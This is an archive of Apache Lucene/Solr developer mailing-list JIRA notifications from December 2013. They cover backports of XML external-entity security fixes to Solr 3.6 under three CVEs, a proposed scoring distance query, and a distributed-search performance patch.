> Backport some security fixes from 4.x to 3.6.x branch
> -
>
> Key: SOLR-5520
> URL: https://issues.apache.org/jira/browse/SOLR-5520
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 3.6.2
>Reporter: Uwe Schindler
>Assignee: Uwe Schindler
> Fix For: 3.6.3
>
> Attachments: SOLR-4481-3895-36.patch, SOLR-4882-36.patch
>
>
> Redhat wants to backport some security fixes we applied in 4.1 and 4.6 to the 
> Solr tree to 3.6, because their user-base still uses this version. To help 
> them with backporting across the major API/version changes, we should also do 
> this on the 3.6 branch.
> Redhat already assigned 3 CVE numbers to these issues and takes the older 
> issues seriously; they will patch older versions and also force users to 
> upgrade. cf. 
> [CVE-2013-6397|https://access.redhat.com/security/cve/CVE-2013-6397] 
> (SOLR-4882), 
> [CVE-2013-6407|https://access.redhat.com/security/cve/CVE-2013-6407] 
> (SOLR-3895), 
> [CVE-2013-6408|https://access.redhat.com/security/cve/CVE-2013-6408] 
> (SOLR-4881).
> To fully fix, we might need to backport more patches. I will take care of 
> this. This issue may be useful, if we release a 3.6.3 package.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (LUCENE-2395) Add a scoring DistanceQuery that does not need caches and separate filters

2013-12-02 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-2395?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836499#comment-13836499
 ] 

Uwe Schindler commented on LUCENE-2395:
---

Currently the expressions module does not yet allow modifying the score of a 
query. This is on my todo list. I discussed that with Shai remotely, and with 
Robert in person the last time I was at his house :-)

But yes, this would be cool!

> Add a scoring DistanceQuery that does not need caches and separate filters
> --
>
> Key: LUCENE-2395
> URL: https://issues.apache.org/jira/browse/LUCENE-2395
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: modules/spatial
>Reporter: Uwe Schindler
> Attachments: ASF.LICENSE.NOT.GRANTED--DistanceQuery.java, 
> ASF.LICENSE.NOT.GRANTED--DistanceQuery.java
>
>
> In a chat with Chris Male, plus my own ideas from implementing for PANGAEA, I 
> thought about the broken distance query in contrib. It lacks the following 
> features:
> - It needs a query/filter for the enclosing bbox (which is constant score)
> - It needs a separate filter for filtering out hits too far away (inside bbox 
> but outside the distance limit)
> - It has no scoring, so if somebody wants to sort by distance, he needs to 
> use the custom sort. For that to work, spatial caches the distance calculation 
> (which is broken for multi-segment search)
> The idea is now to combine all three things into one query, but customizable:
> We first thought about extending CustomScoreQuery, calculating the distance 
> from FieldCache in the customScore method, and returning a score of 1 for 
> distance=0, a score of 0 at the max distance, and score<0 for farther hits that 
> are in the bounding box but not in the distance circle. To filter out such 
> negative scores, we would need to override the scorer in CustomScoreQuery, 
> which is private.
> My proposal is now to use a very stripped-down CustomScoreQuery (but not 
> extend it) that calls a method getDistance(docId) in its scorer's advance 
> and nextDoc that calculates the distance for the current doc. It stores this 
> distance also in the scorer. If the distance > maxDistance it throws away the 
> hit and calls nextDoc() again. The score() method will return per default 
> weight.value*(maxDistance - distance)/maxDistance and uses the precalculated 
> distance. So the distance is only calculated one time in nextDoc()/advance().
> To be able to plug in custom scoring, the following methods in the query can 
> be overridden:
> - float getDistanceScore(double distance) - returns per default: (maxDistance 
> - distance)/maxDistance; allows score customization
> - DocIdSet getBoundingBoxDocIdSet(Reader, LatLng sw, LatLng ne) - returns a 
> DocIdSet for the bounding box. Per default it returns e.g. the docIdSet of an 
> NRF or a cartesian tier filter. You can even plug in any other DocIdSet, e.g. 
> wrap a Query with QueryWrapperFilter
> - support a setter for the GeoDistanceCalculator that is used by the scorer 
> to get the distance.
> - a LatLng provider (similar to CustomScoreProvider/ValueSource) that returns 
> for a given doc id the lat/lng. This method is called once per IndexReader 
> at scorer creation and will retrieve the coordinates. By that we support 
> FieldCache or whatever.
> This query is almost finished in my head; it just needs coding :-)



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-3614) XML parsing in XPathEntityProcessor doesn't respect ENTITY declarations?

2013-12-02 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-3614?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836491#comment-13836491
 ] 

ASF subversion and git services commented on SOLR-3614:
---

Commit 1547011 from [~thetaphi] in branch 'dev/branches/lucene_solr_3_6'
[ https://svn.apache.org/r1547011 ]

SOLR-5520: Backports of:
- SOLR-4881 (Fix DocumentAnalysisRequestHandler to correctly use 
EmptyEntityResolver to prevent loading of external entities like 
UpdateRequestHandler does)
- SOLR-3895 (XML and XSLT UpdateRequestHandler should not try to resolve 
external entities)
- SOLR-3614 (Fix XML parsing in XPathEntityProcessor to correctly expand named 
entities, but ignore external entities)

> XML parsing in XPathEntityProcessor doesn't respect ENTITY declarations?
> 
>
> Key: SOLR-3614
> URL: https://issues.apache.org/jira/browse/SOLR-3614
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 3.6, 4.0-BETA
>Reporter: Hoss Man
>Assignee: Uwe Schindler
> Fix For: 4.1, 5.0
>
> Attachments: SOLR-3614.patch
>
>
> As reported by Michael Belenki on solr-user, pointing XPathEntityProcessor at 
> XML files that use DTD "ENTITY" declarations causes XML parse errors of the 
> form...
> {noformat}
> org.apache.solr.handler.dataimport.DataImportHandlerException: Parsing failed 
> for xml, url:testdata.xml rows processed:0
> ...
> Caused by: java.lang.RuntimeException: com.ctc.wstx.exc.WstxParsingException: 
> Undeclared general entity "uuml"
> ...
> {noformat}
> ...even when the entity is specifically declared.
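
For reference, a minimal constructed document of the failing kind: the entity 
is declared inline in the internal DTD subset, yet the parser still reported it 
as undeclared:

{noformat}
<?xml version="1.0"?>
<!DOCTYPE doc [ <!ENTITY uuml "&#252;"> ]>
<doc>
  <row>M&uuml;ller</row>
</doc>
{noformat}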



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-5478) Speed-up distributed search with high rows param or deep paging by transforming docId's to uniqueKey via memory docValues

2013-12-02 Thread Manuel Lenormand (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-5478?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Manuel Lenormand updated SOLR-5478:
---

Attachment: SOLR-5478.patch

Repatched it; waiting for comments.

> Speed-up distributed search with high rows param or deep paging by 
> transforming docId's to uniqueKey via memory docValues
> -
>
> Key: SOLR-5478
> URL: https://issues.apache.org/jira/browse/SOLR-5478
> Project: Solr
>  Issue Type: Improvement
>  Components: Response Writers
>Affects Versions: 4.5
>Reporter: Manuel Lenormand
> Fix For: 4.6
>
> Attachments: SOLR-5478.patch
>
>




--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-3895) For several reasons, disabling the resolving of external entities within the Solr UpdateRequestHandler for XML would be good.

2013-12-02 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-3895?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836490#comment-13836490
 ] 

ASF subversion and git services commented on SOLR-3895:
---

Commit 1547011 from [~thetaphi] in branch 'dev/branches/lucene_solr_3_6'
[ https://svn.apache.org/r1547011 ]

SOLR-5520: Backports of:
- SOLR-4881 (Fix DocumentAnalysisRequestHandler to correctly use 
EmptyEntityResolver to prevent loading of external entities like 
UpdateRequestHandler does)
- SOLR-3895 (XML and XSLT UpdateRequestHandler should not try to resolve 
external entities)
- SOLR-3614 (Fix XML parsing in XPathEntityProcessor to correctly expand named 
entities, but ignore external entities)

> For several reasons, disabling the resolving of external entities within the 
> Solr UpdateRequestHandler for XML would be good.
> -
>
> Key: SOLR-3895
> URL: https://issues.apache.org/jira/browse/SOLR-3895
> Project: Solr
>  Issue Type: Improvement
>  Components: update
>Affects Versions: 3.6.1, 4.0-BETA
>Reporter: Martin Herfurt
>Assignee: Uwe Schindler
>Priority: Minor
> Fix For: 4.1, 5.0
>
> Attachments: SOLR-3895+3614.patch, SOLR-3895+3614.patch, 
> SOLR-3895.patch, SOLR-3895.patch, SOLR-3895.patch, SOLR-3895.patch
>
>
> The Solr UpdateRequestHandler for XML currently resolves so-called XML 
> External Entities. Not resolving XML External Entities would - among other 
> things - improve Solr's update performance.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-5478) Speed-up distributed search with high rows param or deep paging by transforming docId's to uniqueKey via memory docValues

2013-12-02 Thread Manuel Lenormand (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-5478?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Manuel Lenormand updated SOLR-5478:
---

Attachment: (was: DocValuesBinaryResponseWriter.java)

> Speed-up distributed search with high rows param or deep paging by 
> transforming docId's to uniqueKey via memory docValues
> -
>
> Key: SOLR-5478
> URL: https://issues.apache.org/jira/browse/SOLR-5478
> Project: Solr
>  Issue Type: Improvement
>  Components: Response Writers
>Affects Versions: 4.5
>Reporter: Manuel Lenormand
> Fix For: 4.6
>
>




--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org


